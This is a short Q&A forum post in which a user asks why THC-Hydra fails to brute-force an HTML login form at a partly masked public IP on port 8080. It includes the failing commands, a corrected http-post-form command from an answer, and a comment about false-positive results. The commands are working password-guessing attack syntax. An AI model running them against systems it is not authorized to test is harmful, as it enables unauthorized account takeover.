# How to find post username and password of a html form using Thc-hydra?

Tags: security, forms, hydra, http-post

The url of my login page is `119.xx.xxx.xxx:8080/webpage/` .

When I enter this url in browser to go to the login page, I see this request header `GET /webpage/ HTTP/1.1`.

The url in the action attribute of the login form is `/webpage/login/loginCheck`.

In Thc-hydra I am giving this command `hydra -t 1 -V -f -l user1234 -P pass.txt 119.xx.xxx.xxx http-post-form "/webpage/login/loginCheck:userId=^USER^&password=^PASS^:F=Login page"` .

But the result says that `Child with pid 1234 terminating, cannot connect`

When I try this command `hydra -t 1 -V -f -l user1234 -P pass.txt 119.xx.xxx.xxx:8080/webpage/ http-post-form "/login/loginCheck:userId=^USER^&password=^PASS^:F=Login page"` I get the error `network size may only be between /16 and /31: 119.xx.xxx.xxx:8080/webpage/`

Where I am making the mistake? How can I solve this?

Answer (score 0):

As said, the first example does not have the port number, and the second example contains a mixture of different URL path formats.

I would try this format

```
hydra -t 1 -V -f -l user1234 -P pass.txt "http-post-form://192.168.1.2:8080/login/loginCheck:userId=^USER^&password=^PASS^:F=Login page"
```

Comment: It works but the result shows an incorrect password,which is the first word in the pass.txt file, as valid password. Then I used -t 10 and the result now shows all the passwords in the pass.txt file valid. What to do?